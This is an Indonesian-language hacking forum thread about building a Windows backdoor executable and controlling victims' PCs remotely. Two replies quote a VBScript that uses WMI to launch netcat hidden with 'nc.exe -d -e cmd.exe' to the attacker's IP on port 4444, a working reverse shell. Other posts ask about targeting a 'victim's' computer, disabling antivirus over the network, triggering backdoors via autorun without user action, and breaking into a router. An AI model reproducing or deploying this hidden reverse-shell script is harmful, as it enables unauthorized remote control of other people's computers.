Remote windows dengan backdoor exe

**civo** · 11-20-2011, 03:25 PM

(11-20-2011, 09:39 AM)cassaprodigy Wrote: jelas gk bisa klo router mikocoknya gk di set bridge .. kudu minta ijin admin atu jebol waee tuh mikrotik terus setting sendiri jadi bridge

wadaw..klo di jebol ntar ane bisa kena:badpc: adminnya omz
untuk routernya pake routerboard nih omz Angry

OK dech omz semua,ane mau uji coba lagi dech...resiko terbesar paling cuma Ip ane di block ma admin Big Grin

**rezploit69** · 12-14-2011, 09:11 PM

ane coba ifconfig ni om

root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:26:2d:a4:62:77
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:354 errors:0 dropped:0 overruns:0 frame:0
TX packets:354 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24045 (24.0 KB) TX bytes:24045 (24.0 KB)

ppp0 Link encap Tongue

oint-to-Point Protocol
inet addr:182.4.40.xxx P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:2031 errors:0 dropped:0 overruns:0 frame:0
TX packets:2205 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:1780794 (1.7 MB) TX bytes:320855 (320.8 KB)

wlan0 Link encap:Ethernet HWaddr 78:e4:00:0f:e4:a6
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ane bingung ip publik tu yg mana, apa yg di ppp0 yg inet address itu ya??
tapi itu berubah" , pas bikin backdoor zee.exe nya brhsil
tpi tiba" disconnect modemnya... hihh ane gedek bnget om
terpaksa edit zee.vbs nya lgi n gnti IP cz klo udah disconnect IP.nya berubah Sad

ane masih nubi soal inet protocol om
mgkin om" dsni bisa kasih solusi biar IP.nya statis
oh iya kta om zee si ganteng musti set ke mode bridge dlu,caranya gmna ya om??
ane pke modem brrti koneksinya wired kn om

maaf klo bnyak tnya... bingung nih om

**cassaprodigy** · 12-15-2011, 12:34 AM

(11-20-2011, 03:25 PM)civo Wrote:
(11-20-2011, 09:39 AM)cassaprodigy Wrote: jelas gk bisa klo router mikocoknya gk di set bridge .. kudu minta ijin admin atu jebol waee tuh mikrotik terus setting sendiri jadi bridge

wadaw..klo di jebol ntar ane bisa kena:badpc: adminnya omz
untuk routernya pake routerboard nih omz
OK dech omz semua,ane mau uji coba lagi dech...resiko terbesar paling cuma Ip ane di block ma admin

hehehe namanya juga mencoba Tongue

(12-14-2011, 09:11 PM)rezploit69 Wrote: ane coba ifconfig ni om

root@bt:~# ifconfig
eth0 Link encap:Ethernet HWaddr 00:26:2d:a4:62:77
inet addr:127.0.0.1 Bcast:127.255.255.255 Mask:255.0.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Interrupt:16

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:354 errors:0 dropped:0 overruns:0 frame:0
TX packets:354 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:24045 (24.0 KB) TX bytes:24045 (24.0 KB)

ppp0 Link encapoint-to-Point Protocol
inet addr:182.4.40.xxx P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:2031 errors:0 dropped:0 overruns:0 frame:0
TX packets:2205 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:1780794 (1.7 MB) TX bytes:320855 (320.8 KB)

wlan0 Link encap:Ethernet HWaddr 78:e4:00:0f:e4:a6
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

ane bingung ip publik tu yg mana, apa yg di ppp0 yg inet address itu ya??
tapi itu berubah" , pas bikin backdoor zee.exe nya brhsil
tpi tiba" disconnect modemnya... hihh ane gedek bnget om
terpaksa edit zee.vbs nya lgi n gnti IP cz klo udah disconnect IP.nya berubah

ane masih nubi soal inet protocol om
mgkin om" dsni bisa kasih solusi biar IP.nya statis
oh iya kta om zee si ganteng musti set ke mode bridge dlu,caranya gmna ya om??
ane pke modem brrti koneksinya wired kn om

maaf klo bnyak tnya... bingung nih om

itu ppp0 sudah ip publik bro .. coba cek di situs2 penyedia untuk melihat ip...

**fake666** · 01-17-2012, 06:28 PM

jadi ita perlu laptop/komputer korba ya ???

**monstercilik** · 01-30-2012, 01:07 AM

wih keren nih om zee.!! ilmu baru lagi buat seorang pengguna baru.. ini tergolong trojan ya?? apa program ini terdeteksi sama antivirus??

oh ya om zee. kapan2 share dong cara kill antivirus lewat jaringan misalnya atau seperti program yg om zee buat ini. hehe

**MenthaPiperita** · 01-30-2012, 02:11 AM

nais share bro

kpn" ane coba dah...
sangat bermamfaat bagi rekan" yg melek IT nie T_______T

**civo** · 02-24-2012, 12:58 AM

ane coba pppoeconf di modem flexy ga bisa yaa Angry

**onde2bunder** · 02-29-2012, 10:40 AM

(07-08-2011, 03:58 AM)zee eichel Wrote: Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)

om zee btw itu script bahasa apa ya ?? kira2 ada g cara agar kita dapat melakukan backdoor atau hack PC tanpa harus menunggu trigger dari target ?
thanks

**fusae ninomiya chan** · 04-25-2012, 12:52 PM

(02-29-2012, 10:40 AM)onde2bunder Wrote:
(07-08-2011, 03:58 AM)zee eichel Wrote: Const HIDDEN_WINDOW = 1
strComputer = "."
Set objStartup = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_ProcessStartup")
Set objProcess = GetObject("winmgmts:" _
& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2:Win32_Process")
Set objConfig = objStartup.SpawnInstance_
objConfig.ShowWindow = HIDDEN_WINDOW
errReturn = objProcess.Create("C:\nc.exe -d -e cmd.exe ip-ente 4444", null, objConfig, intProcessID)

om zee btw itu script bahasa apa ya ?? kira2 ada g cara agar kita dapat melakukan backdoor atau hack PC tanpa harus menunggu trigger dari target ?
thanks

memang agak sulit sih ... karena triggered backdoor sangat di perlukan .. bisa sich klo di modip pke autorun ... nnti TS aja dech yg jelasin :p

**bryan18** · 11-04-2012, 11:57 PM

ijin nyimak om.. sepertinya menarik n perlu dicoba,,,